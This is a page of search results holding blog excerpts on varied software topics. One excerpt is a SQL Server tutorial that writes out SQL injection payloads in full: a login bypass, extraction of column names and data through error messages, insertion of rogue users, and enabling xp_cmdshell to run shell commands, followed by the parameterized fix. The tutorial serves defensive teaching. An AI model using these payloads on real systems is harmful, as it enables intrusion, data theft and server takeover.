Search Results

Search found 2210 results on 89 pages for 'techniques'.

Page 52/89 | < Previous Page | 48 49 50 51 52 53 54 55 56 57 58 59  | Next Page >

  • DEEP DIVE MVVM at #MIX11

    - by Laurent Bugnion
    The public (you!) has spoken, and “Deep Dive MVVM” was selected (along with 11 other open call talks) out of 217 proposals. There were 17’000 votes! These are pretty amazing numbers, and believe me when I tell you that I still didn’t completely realize what just happened! I want to really underline the outstanding quality of many of the talks that were proposed. I decided not to reveal my votes, because I just know too many of the candidates and I had only 10 votes but let’s just say that some of my favorites were picked, and some were not, and I really wish that I can see them all either at MIX or in another conference. I already started putting down ideas for the talk (not too many, because I didn’t want to jinx it) and it should be a really great session. We will, as the title shows, dive deep into the subtleties of MVVM, and explore some techniques that allow to overcome some of the hurdles presented by this pattern. This session will be shaped by many emails that I received over the past year, since “Understanding the MVVM pattern” was presented, and offered, for many, a first look into Model-View-ViewModel. So now’s the chance, comment and let me know what topics you would like to discuss. If you had not done so before, go ahead and watch last year’s session, it will be a great preparation. Let’s talk real life development, let’s explore the problems and find solutions. I already have a nice collection of emails asking questions around MVVM and my goal is to answer as many as I can. Leave a comment and I will do my best to answer these as well. The date/time was not announced yet, so watch this space for details. I am really looking forward to seeing many of you in Las Vegas, and for those who cannot make it, don’t worry, all the sessions will be published in video by the amazing MIX team a few hours after the session actually takes place. Thanks for your confidence and in the meantime, Happy Coding! Laurent Laurent Bugnion (GalaSoft) Subscribe | Twitter | Facebook | Flickr | LinkedIn

    Read the article

  • Why’s (Poignant) Guide to Ruby

    - by Ben Griswold
    You’re familiar with O’Reilly’s brilliant Head First Series, right?  Great.  Then you know how every book begins with an explanation of the Head First teaching style and you know the teaching format which Kathy Sierra and Bert Bates developed is based on research in cognitive science, neurobiology and educational psychology and it’s all about making learning visual and conversational and attractive and emotional and it’s highly effective.  Anyway, it’s a great series and you should read every last one of the books. Moving on… I’ve been wanting to learn more about Ruby and Why’s (Poignant) Guide to Ruby has been on my reading list for a while and there was talk about cartoon foxes and other silliness and I figured Why’s (Poignant) Guide to Ruby probably takes the same unorthodox teaching style as the Head First books – and that’s great – so I read the book, in piecemeal, over the last couple of weeks and, well, I figured wrong. Now having read the book, here’s my take on Why’s (Poignant) Guide – it’s very creative and clever and it does a darn good job of introducing one to Ruby.  If you’re interested in Ruby or simply interested, the online book is worth your time.  If you’re thinking (like me) that cartoon foxes will be doing the teaching, that’s simple not the case.  However, the cartoons and the random stories in the sidebar may serve a purpose. Unlike the Head First books where images and captions are used to further explain the teachings, the cartoons and stories in Why’s Guide serve as intermission and offer your brain a brief moment of rest before the next Ruby concept is explained.  It’s not a bad strategy, but definitely not as effective as the Head First techniques.  

    Read the article

  • OpenGL ES 2 shaders for drawing buildings and roads like Google Maps does

    - by Pris
    I'm trying to create a shader that'll give me an effect similar to what buildings and roads look like on 3D Google Maps. You can see the effect interactively if you enable WebGL at maps.google.com, and I also found a couple of screenshots that illustrate what I'm trying to achieve: Thing I noticed: There's some kind of transparency thing going on with the roads/ground and the buildings, but not between the buildings themselves. It might be that they're rendering the ground and roads after the buildings with the right blend functions to achieve that effect. If you look closely, you'll see parts of the building profiles have an outline. The roads also have nice clean outlines. There are a lot of techniques for outlining things with shaders... but I'm curious to find out what might have been used in this case considering mobile hardware and a large number of entities with outlines (roads and buildings) I'm assuming that for the lighting, some sort of simple diffuse per-vertex shader is being used for the buildings though I could be wrong. I'm especially curious about the 'look' they achieved with buildings (clean, precise outlines/shading). It reminds me a little of what you'd see when designing stuff with CAD applications like SolidWorks: I'd appreciate any advice on achieving this kind of look with ES 2 shaders.

    Read the article

  • The Earth at Night [Video]

    - by Jason Fitzpatrick
    This fresh video from NASA provides the clearest view of the Earth at night ever seen, thanks to the Suomi National Polar-orbiting Partnership Satellite. Check out the video and accompanying pics to see the stunning views. In daylight our big blue marble is all land, oceans and clouds. But the night – is electric. This view of Earth at night is a cloud-free view from space as acquired by the Suomi National Polar-orbiting Partnership Satellite (Suomi NPP). A joint program by NASA and NOAA, Suomi NPP captured this nighttime image by the satellite’s Visible Infrared Imaging Radiometer Suite (VIIRS). The day-night band on VIIRS detects light in a range of wavelengths from green to near infrared and uses filtering techniques to observe signals such as city lights, gas flares, and wildfires. This new image is a composite of data acquired over nine days in April and thirteen days in October 2012. It took 312 satellite orbits and 2.5 terabytes of data to get a clear shot of every parcel of land surface. This video uses the Earth at night view created by NASA’s Earth Observatory with data processed by NOAA’s National Geophysical Data Center and combined with a version of the Earth Observatory’s Blue Marble: Next Generation. Hit up the link below for the full NASA press release, including more videos and photos. How to Factory Reset Your Android Phone or Tablet When It Won’t Boot Our Geek Trivia App for Windows 8 is Now Available Everywhere How To Boot Your Android Phone or Tablet Into Safe Mode

    Read the article

  • A client wants us to screen work machines for pornography. Is it possible?

    - by Scant Roger
    A long-time client has asked us to help screen their work machines for pornography. They're worried about liability if sensitive materials were found. Their main concerns (for obvious reasons) are video, audio, and image files. If possible, they'd also like to scan text-based documents for inappropriate content. They have a hierarchy of not-for-work content starting with blatantly illegal (I don't have to list details), moving down to obviously offensive, and also including things that may be offensive to some - think lingerie ads, joke cards featuring butt cracks, and anything related to Howie Mandel. My questions are: Is this ethical? I think it is since every employee legally agrees that their work machine belongs to the company and is subject to search. The screenings are not to occur on personal machines brought to work. Is it feasible? I've done a lot of image processing/indexing but this seems like a whole new world of complexity. Any references to successful techniques for discovering porn? Is it appropriate for me to archive the results when something is discovered?

    Read the article

  • Software Engineering Practices &ndash; Different Projects should have different maturity levels

    - by Dylan Smith
    I’ve had a lot of discussions at the office lately about the drastically different sets of software engineering practices used on our various projects, if what we are doing is appropriate, and what factors should you be considering when determining what practices are most appropriate in a given context. I wanted to write up my thoughts in a little more detail on this subject, so here we go: If you compare any two software projects (specifically comparing their codebases) you’ll often see very different levels of maturity in the software engineering practices employed. By software engineering practices, I’m specifically referring to the quality of the code and the amount of technical debt present in the project. Things such as Test Driven Development, Domain Driven Design, Behavior Driven Development, proper adherence to the SOLID principles, etc. are all practices that you would expect at the mature end of the spectrum. At the other end of the spectrum would be the quick-and-dirty solutions that are done using something like an Access Database, Excel Spreadsheet, or maybe some quick “drag-and-drop coding”. For this blog post I’m going to refer to this as the Software Engineering Maturity Spectrum (SEMS). I believe there is a time and a place for projects at every part of that SEMS. The risks and costs associated with under-engineering solutions have been written about a million times over so I won’t bother going into them again here, but there are also (unnecessary) costs with over-engineering a solution. Sometimes putting multiple layers, and IoC containers, and abstracting out the persistence, etc is complete overkill if a one-time use Access database could solve the problem perfectly well. A lot of software developers I talk to seem to automatically jump to the very right-hand side of this SEMS in everything they do. A common rationalization I hear is that it may seem like a small trivial application today, but these things always grow and stick around for many years, then you’re stuck maintaining a big ball of mud. I think this is a cop-out. Sure you can’t always anticipate how an application will be used or grow over its lifetime (can you ever??), but that doesn’t mean you can’t manage it and evolve the underlying software architecture as necessary (even if that means having to toss the code out and re-write it at some point…maybe even multiple times). My thoughts are that we should be making a conscious decision around the start of each project approximately where on the SEMS we want the project to exist. I believe this decision should be based on 3 factors: 1. Importance - How important to the business is this application? What is the impact if the application were to suddenly stop working? 2. Complexity - How complex is the application functionality? 3. Life-Expectancy - How long is this application expected to be in use? Is this a one-time use application, does it fill a short-term need, or is it more strategic and is expected to be in-use for many years to come? Of course this isn’t an exact science. You can’t say that Project X should be at the 73% mark on the SEMS and expect that to be helpful. My point is not that you need to precisely figure out what point on the SEMS the project should be at then translate that into some prescriptive set of practices and techniques you should be using. Rather my point is that we need to be aware that there is a spectrum, and that not everything is going to be (or should be) at the edges of that spectrum, indeed a large number of projects should probably fall somewhere within the middle; and different projects should adopt a different level of software engineering practices and maturity levels based on the needs of that project. To give an example of this way of thinking from my day job: Every couple of years my company plans and hosts a large event where ~400 of our customers all fly in to one location for a multi-day event with various activities. We have some staff whose job it is to organize the logistics of this event, which includes tracking which flights everybody is booked on, arranging for transportation to/from airports, arranging for hotel rooms, name tags, etc The last time we arranged this event all these various pieces of data were tracked in separate spreadsheets and reconciliation and cross-referencing of all the data was literally done by hand using printed copies of the spreadsheets and several people sitting around a table going down each list row by row. Obviously there is some room for improvement in how we are using software to manage the event’s logistics. The next time this event occurs we plan to provide the event planning staff with a more intelligent tool (either an Excel spreadsheet or probably an Access database) that can track all the information in one location and make sure that the various pieces of data are properly linked together (so for example if a person cancels you only need to delete them from one place, and not a dozen separate lists). This solution would fall at or near the very left end of the SEMS meaning that we will just quickly create something with very little attention paid to using mature software engineering practices. If we examine this project against the 3 criteria I listed above for determining it’s place within the SEMS we can see why: Importance – If this application were to stop working the business doesn’t grind to a halt, revenue doesn’t stop, and in fact our customers wouldn’t even notice since it isn’t a customer facing application. The impact would simply be more work for our event planning staff as they revert back to the previous way of doing things (assuming we don’t have any data loss). Complexity – The use cases for this project are pretty straightforward. It simply needs to manage several lists of data, and link them together appropriately. Precisely the task that access (and/or Excel) can do with minimal custom development required. Life-Expectancy – For this specific project we’re only planning to create something to be used for the one event (we only hold these events every 2 years). If it works well this may change (see below). Let’s assume we hack something out quickly and it works great when we plan the next event. We may decide that we want to make some tweaks to the tool and adopt it for planning all future events of this nature. In that case we should examine where the current application is on the SEMS, and make a conscious decision whether something needs to be done to move it further to the right based on the new objectives and goals for this application. This may mean scrapping the access database and re-writing it as an actual web or windows application. In this case, the life-expectancy changed, but let’s assume the importance and complexity didn’t change all that much. We can still probably get away with not adopting a lot of the so-called “best practices”. For example, we can probably still use some of the RAD tooling available and might have an Autonomous View style design that connects directly to the database and binds to typed datasets (we might even choose to simply leave it as an access database and continue using it; this is a decision that needs to be made on a case-by-case basis). At Anvil Digital we have aspirations to become a primarily product-based company. So let’s say we use this tool to plan a handful of events internally, and everybody loves it. Maybe a couple years down the road we decide we want to package the tool up and sell it as a product to some of our customers. In this case the project objectives/goals change quite drastically. Now the tool becomes a source of revenue, and the impact of it suddenly stopping working is significantly less acceptable. Also as we hold focus groups, and gather feedback from customers and potential customers there’s a pretty good chance the feature-set and complexity will have to grow considerably from when we were using it only internally for planning a small handful of events for one company. In this fictional scenario I would expect the target on the SEMS to jump to the far right. Depending on how we implemented the previous release we may be able to refactor and evolve the existing codebase to introduce a more layered architecture, a robust set of automated tests, introduce a proper ORM and IoC container, etc. More likely in this example the jump along the SEMS would be so large we’d probably end up scrapping the current code and re-writing. Although, if it was a slow phased roll-out to only a handful of customers, where we collected feedback, made some tweaks, and then rolled out to a couple more customers, we may be able to slowly refactor and evolve the code over time rather than tossing it out and starting from scratch. The key point I’m trying to get across is not that you should be throwing out your code and starting from scratch all the time. But rather that you should be aware of when and how the context and objectives around a project changes and periodically re-assess where the project currently falls on the SEMS and whether that needs to be adjusted based on changing needs. Note: There is also the idea of “spectrum decay”. Since our industry is rapidly evolving, what we currently accept as mature software engineering practices (the right end of the SEMS) probably won’t be the same 3 years from now. If you have a project that you were to assess at somewhere around the 80% mark on the SEMS today, but don’t touch the code for 3 years and come back and re-assess its position, it will almost certainly have changed since the right end of the SEMS will have moved farther out (maybe the project is now only around 60% due to decay). Developer Skills Another important aspect to this whole discussion is around the skill sets of your architects and lead developers. When talking about the progression of a developers skills from junior->intermediate->senior->… they generally start by only being able to write code that belongs on the left side of the SEMS and as they gain more knowledge and skill they become capable of working at a higher and higher level along the SEMS. We all realize that the learning never stops, but eventually you’ll get to the point where you can comfortably develop at the right-end of the SEMS (the exact practices and techniques that translates to is constantly changing, but that’s not the point here). A critical skill that I’d love to see more evidence of in our industry is the most senior guys not only being able to work at the right-end of the SEMS, but more importantly be able to consciously work at any point along the SEMS as project needs dictate. An even more valuable skill would be if you could make the conscious decision to move a projects code further right on the SEMS (based on changing needs) and do so in an incremental manner without having to start from scratch. An exercise that I’m planning to go through with all of our projects here at Anvil in the near future is to map out where I believe each project currently falls within this SEMS, where I believe the project *should* be on the SEMS based on the business needs, and for those that don’t match up (i.e. most of them) come up with a plan to improve the situation.

    Read the article

  • Book Review: Getting Started With Window 8 Apps By Ben Dewey

    - by Tim Murphy
    When O’Reilly gave me an opportunity to review this book I was excited.  It gave me a reason to finally put some time into this new platform and what developers will need to learn in order to be successful. This book by Ben Dewey is only 92 pages long, so if you were looking for an in-depth treatment of Windows 8 development you will need supplemental materials.  It is also due for an update from the perspective of recent changes made by Microsoft prior to the final release of the OS and tools.  This causes a few issues if you try to run the code samples because of namespace changes. I was encouraged by the fact that the author didn’t do the typical “hello world” app.  He uses a lot of pattern based development techniques and hits many of the main topics including: Application lifecycle Charms integration Tiles Sensors The lifecycle is critical for anyone who hasn’t done mobile development before.  Limited resources on these devices mean that the OS can suspend or kill your app altogether if it decides it needs to.  He covers tombstoning which is the key to Windows 8 and Windows Phone lifecycle management. He also dedicates a chapter to marketing and distributing the application you build.  From my experience with Windows Phone development this is crucial information.  You need to know how to test your application so that it is going to pass certification and present your app so that it is going to get noticed amongst thousands of other apps. The main things that I wish had been in the book explanations of more of the common controls and more complete explanation of patterns that were implemented. In the end this book is a good foundation getting exposure to the concepts that underlie this new version of the Windows platform and how it effects developers.  It isn’t a book that I would suggest for someone just getting into development with no understanding of pattern based development. del.icio.us Tags: Windows 8,O'Reilly,Ben Dewey,Book Review,Review

    Read the article

  • Advanced Oracle SOA Suite Oracle Open World 2012 SOA Presentations

    - by JuergenKress
    The list below only includes SOA presentations delivered or moderated by Oracle SOA Product Management. For a complete list of Oracle Open World 2012 presentations, please go here. Oracle SOA Suite, the Most Capable Tool for Every Possible Integration Challenge Using the Right Tools, Techniques, and Technologies for Integration Projects Administration and Management Essentials for Oracle SOA Suite 11g Extreme Performance and Scale Delivered by SOA on Oracle Exalogic Successful Application Integration and SOA Projects: Customer Panel How to Integrate Cloud Applications with Oracle SOA Suite Transforming the Utilities Industry with Oracle Fusion Middleware Cloud and On-Premises Applications Integration, Using Oracle Integration Adapters Delivering High Value B2B Gateways with Oracle SOA Suite 11g Implementing Successful Healthcare Applications with Oracle SOA Suite Migrating to Oracle SOA Suite: A Sun Java CAPS Customer Experience If Mobile Enablement Is on Your Mind, Oracle SOA Suite and Oracle Service Bus Can Help Building Shared Services Infrastructure with Oracle Service Bus: Customer Panel SOA & BPM Partner Community For regular information on Oracle SOA Suite become a member in the SOA & BPM Partner Community for registration please visit  www.oracle.com/goto/emea/soa (OPN account required) If you need support with your account please contact the Oracle Partner Business Center. Blog Twitter LinkedIn Mix Forum Technorati Tags: OOW,OOW presentations,OOW soa ppt,SOA Community,Oracle SOA,Oracle BPM,Community,OPN,Jürgen Kress

    Read the article

  • Power Dynamic Database-Driven Websites with MySQL & PHP

    - by Antoinette O'Sullivan
    Join major names among MySQL customers by learning to power dynamic database-driven websites with MySQL & PHP. With the MySQL and PHP: Developing Dynamic Web Applications course, in 4 days, you learn how to develop applications in PHP and how to use MySQL efficiently for those applications! Through a hands-on approach, this instructor-led course helps you improve your PHP skills and combine them with time-proven database management techniques to create best-of-breed web applications that are efficient, solid and secure. You can currently take this course as a: Live Virtual Class (LVC): There are a number events on the schedule to suit different timezones in January 2013 and March 2013. With an LVC, you get to follow this live instructor-led class from your own desk - so no travel expense or inconvenience. In-Class Event: Travel to an education center to attend this class. Here are some events already on the scheduled:  Where  When  Delivery Language  Lisbon, Portugal  15 April 2013  European Portugese  Porto, Portugal 15 April 2013   European Portugese  Barcelona, Spain 28 February 2013  Spanish  Madrid, Spain 4 March 2013   Spanish If you do not see an event that suits you, register your interest in an additional date/location/delivery language. If you want more indepth knowledge on developing with MySQL and PHP, consider the MySQL for Developers course. For full details on these and all courses on the authentic MySQL curriculum, go to http://oracle.com/education/mysql.

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
    SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, having no input clean up or validation, allowing applications to connect with elevated (e.g. sa) privileges and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we demonstrate two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability. 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data then the C# code with the actual SQL Injection example from beginning to the end. The comments in code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of out hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. /* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists == "1"; }} We have seen just how much danger we're in, if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. /*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use SQL injectionThe SQL injection principles are the same aswith SQL string concatenation I described earlier,so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double check. If there's even one place where you're not using proper parameterized SQL you have vulnerability and SQL injection can bare its ugly teeth.

    Read the article

  • Numerous Unexpected Obstacles Ruining any Project Plans

    - by Libor
    I am working as software developer and struggling with this problem time and time again for almost thirteen years. There seems not to be any way out of the following problem. And it happens with small projects as well. For example, I plan to write an extension for Microsoft Visual Studio. I dowload learning materials, get some book on the topic and allocate time for learning and development. However, during the development, many seemingly trivial problems arise, for example: Why the script refuses to delete the file? Why Visual Studio does not register the extension? (after two days) OK, it registers it, but now it got broken. How to fix it? each of these "small" obstacles usually take 1-5 days to resolve and the project finally consumes several times more man-hours than planned. Maybe it happens only because I am working on Microsoft platform and many of their Frameworks and architectures are bit confusing and badly documented. I would like to have most problems resolved by finding answer in a book or official documentation (MSDN), but the only answer I usually find is on some weird forum or personal blog googled after desperately searching for any relevant information on the topic. Do you have the same struggles? Do you have techniques on how to prevent these problems? I was thinking of simply multiplying projected time for a given project by some factor, but this does not help. Some projects get done briskly and some take months and the guiding factor here are these small "glitches" which take programmers whole weeks to resolve. I have to admit that lots of these obstacles demoralizes me and drains me of focus and joy of work (who likes to get back to work when he have to resolve some stupid registry problem or weird framework bug instead of doing creative work?) After the project is finally done, I am feeling like dying from thousand cuts.

    Read the article

  • Don't Use "Static" in C#?

    - by Joshiatto
    I submitted an application I wrote to some other architects for code review. One of them almost immediately wrote me back and said "Don't use "static". You can't write automated tests with static classes and methods. "Static" is to be avoided." I checked and fully 1/4 of my classes are marked "static". I use static when I am not going to create an instance of a class because the class is a single global class used throughout the code. He went on to mention something involving mocking, IOC/DI techniques that can't be used with static code. He says it is unfortunate when 3rd party libraries are static because of their un-testability. Is this other architect correct? update: here is an example: APIManager - this class keeps dictionaries of 3rd party APIs I am calling along with the next allowed time. It enforces API usage limits that a lot of 3rd parties have in their terms of service. I use it anywhere I am calling a 3rd party service by calling Thread.Sleep(APIManager.GetWait("ProviderXYZ")); before making the call. Everything in here is thread safe and it works great with the TPL in C#.

    Read the article

  • Inverted textures

    - by brainydexter
    I'm trying to draw textures aligned with this physics body whose coordinate system's origin is at the center of the screen. (XNA)Spritebatch has its default origin set to top-left corner. I got the textures to be positioned correctly, but I noticed my textures are vertically inverted. That is, an arrow texture pointing Up , when rendered points down. I'm not sure where I am going wrong with the math. My approach is to convert everything in physic's meter units and draw accordingly. Matrix proj = Matrix.CreateOrthographic(scale * graphics.GraphicsDevice.Viewport.AspectRatio, scale, 0, 1); Matrix view = Matrix.Identity; effect.World = Matrix.Identity; effect.View = view; effect.Projection = proj; effect.TextureEnabled = true; effect.VertexColorEnabled = true; effect.Techniques[0].Passes[0].Apply(); SpriteBatch.Begin(SpriteSortMode.BackToFront, BlendState.AlphaBlend, null, DepthStencilState.Default, RasterizerState.CullNone, effect); m_Paddles[1].Draw(gameTime); SpriteBatch.End(); where Paddle::Draw looks like: SpriteBatch.Draw(paddleTexture, mBody.Position, null, Color.White, 0f, new Vector2(16f, 16f), // origin of the texture 0.1875f, SpriteEffects.None, // width of box is 3*2 = 6 meters. texture is 32 pixels wide. to make it 6 meters wide in world space: 6/32 = 0.1875f 0); The orthographic projection matrix seem fine to me, but I am obviously doing something wrong somewhere! Can someone please help me figure out what am i doing wrong here ? Thanks

    Read the article

  • SQL SERVER – A Funny Cartoon on Index

    - by pinaldave
    Performance Tuning has been my favorite subject and I have done it for many years now. Today I will list one of the most common conversation about Index I have heard in my life. Every single time, I am at consultation for performance tuning I hear following conversation among various team members. I want to ask you, does this kind of conversation happens in your organization? Any way, If you think Index solves all of your performance problem I think it is not true. There are many other reason one has to consider along with Indexes. For example I consider following various topic one need to understand for performance tuning. ?Logical Query Processing ?Efficient Join Techniques ?Query Tuning Considerations ?Avoiding Common Performance Tuning Issues Statistics and Best Practices ?TempDB Tuning ?Hardware Planning ?Understanding Query Processor ?Using SQL Server 2005 and 2008 Updated Feature Sets ?CPU, Memory, I/O Bottleneck Index Tuning (of course) ?Many more… Well, I have written this blog thinking I will keep this blog post a bit easy and not load up. I will in future discuss about other performance tuning concepts. Let me know what do you think about the cartoon I made. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: Pinal Dave, PostADay, SQL, SQL Authority, SQL Humor, SQL Index, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • Oracle ACEs in the House

    - by Justin Kestelyn
